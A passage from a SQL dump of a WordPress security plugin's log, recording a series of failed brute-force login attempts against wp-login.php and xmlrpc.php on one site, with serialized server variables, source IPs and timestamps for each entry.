empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/blog/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhyrfBTP0kPOVnb8jtxgAAAEQ\";s:12:\"REDIRECT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.168.151\";s:11:\"REMOTE_PORT\";s:5:\"52984\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/blog/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/blog/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhyrfBTP0kPOVnb8jtxgAAAEQ\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071562.4309\";s:12:\"REQUEST_TIME\";s:10:\"1569071562\";}}','notice','2019-09-21 13:12:43','2019-09-21 13:12:42',18313760,19609552,'https://bintara.com.my/blog/xmlrpc.php',1,0,'46.101.168.151'),(25809,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhyXkXpgmG5P@iB8kvowAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"40834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhyXkXpgmG5P@iB8kvowAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071561.4434\";s:12:\"REQUEST_TIME\";s:10:\"1569071561\";}}','notice','2019-09-21 13:12:43','2019-09-21 13:12:41',17960216,19285368,'https://bintara.com.my/2019/wp-login.php',1,0,'159.203.12.18'),(25808,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/2019/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhyXkXpgmG5P@iB8kvowAAAI4\";s:12:\"REDIRECT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"REMOTE_ADDR\";s:13:\"159.203.12.18\";s:11:\"REMOTE_PORT\";s:5:\"40834\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/2019/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/2019/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhyXkXpgmG5P@iB8kvowAAAI4\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071561.4434\";s:12:\"REQUEST_TIME\";s:10:\"1569071561\";}}','notice','2019-09-21 13:12:42','2019-09-21 13:12:41',17798112,19285368,'https://bintara.com.my/2019/wp-login.php',1,0,'159.203.12.18'),(25807,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/blog/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"97\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhxXkXpgmG5P@iB8kvngAAAJE\";s:12:\"REDIRECT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"46.101.168.151\";s:11:\"REMOTE_PORT\";s:5:\"52298\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/blog/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/blog/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhxXkXpgmG5P@iB8kvngAAAJE\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071557.7061\";s:12:\"REQUEST_TIME\";s:10:\"1569071557\";}}','notice','2019-09-21 13:12:39','2019-09-21 13:12:38',17799104,19289720,'https://bintara.com.my/blog/wp-login.php',1,0,'46.101.168.151'),(25806,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:16:\"/test/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhu3kXpgmG5P@iB8kvnAAAAIs\";s:12:\"REDIRECT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.129.222.66\";s:11:\"REMOTE_PORT\";s:5:\"44260\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:38:\"https://bintara.com.my/test/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:16:\"/test/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhu3kXpgmG5P@iB8kvnAAAAIs\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071547.6542\";s:12:\"REQUEST_TIME\";s:10:\"1569071547\";}}','notice','2019-09-21 13:12:29','2019-09-21 13:12:27',18313760,19609552,'https://bintara.com.my/test/xmlrpc.php',1,0,'103.129.222.66'),(25805,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhuViJ7D9Gn7wDPh8gQQAAANg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.129.222.66\";s:11:\"REMOTE_PORT\";s:5:\"43848\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhuViJ7D9Gn7wDPh8gQQAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071545.4849\";s:12:\"REQUEST_TIME\";s:10:\"1569071545\";}}','notice','2019-09-21 13:12:27','2019-09-21 13:12:25',17965384,19289720,'https://bintara.com.my/test/wp-login.php',1,0,'103.129.222.66'),(25804,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:44:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:18:\"/test/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:3:\"100\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhuViJ7D9Gn7wDPh8gQQAAANg\";s:12:\"REDIRECT_URL\";s:18:\"/test/wp-login.php\";s:11:\"REMOTE_ADDR\";s:14:\"103.129.222.66\";s:11:\"REMOTE_PORT\";s:5:\"43848\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:40:\"https://bintara.com.my/test/wp-login.php\";s:10:\"SCRIPT_URL\";s:18:\"/test/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYYhuViJ7D9Gn7wDPh8gQQAAANg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1569071545.4849\";s:12:\"REQUEST_TIME\";s:10:\"1569071545\";}}','notice','2019-09-21 13:12:26','2019-09-21 13:12:25',17803808,19289720,'https://bintara.com.my/test/wp-login.php',1,0,'103.129.222.66'),(25803,0,'brute_force','invalid-login::username-admin','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:5:\"admin\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:43:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:14:\"/wp/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"473\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:14:\"REDIRECT_HTTPS\";s:2:\"on\";s:19:\"REDIRECT_SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:19:\"REDIRECT_SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:20:\"REDIRECT_SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:18:\"REDIRECT_UNIQUE_ID\";s:27:\"XYYhrXkXpgmG5P@iB8kvlQAAAJg\";s:12:\"REDIRECT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"REMOTE_ADDR\";s:14:\"171.244.50.204\";s:11:\"REMOTE_PORT\";s:5:\"45258\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:36:\"https://bintara.com.my/wp/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:14:\"/wp/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\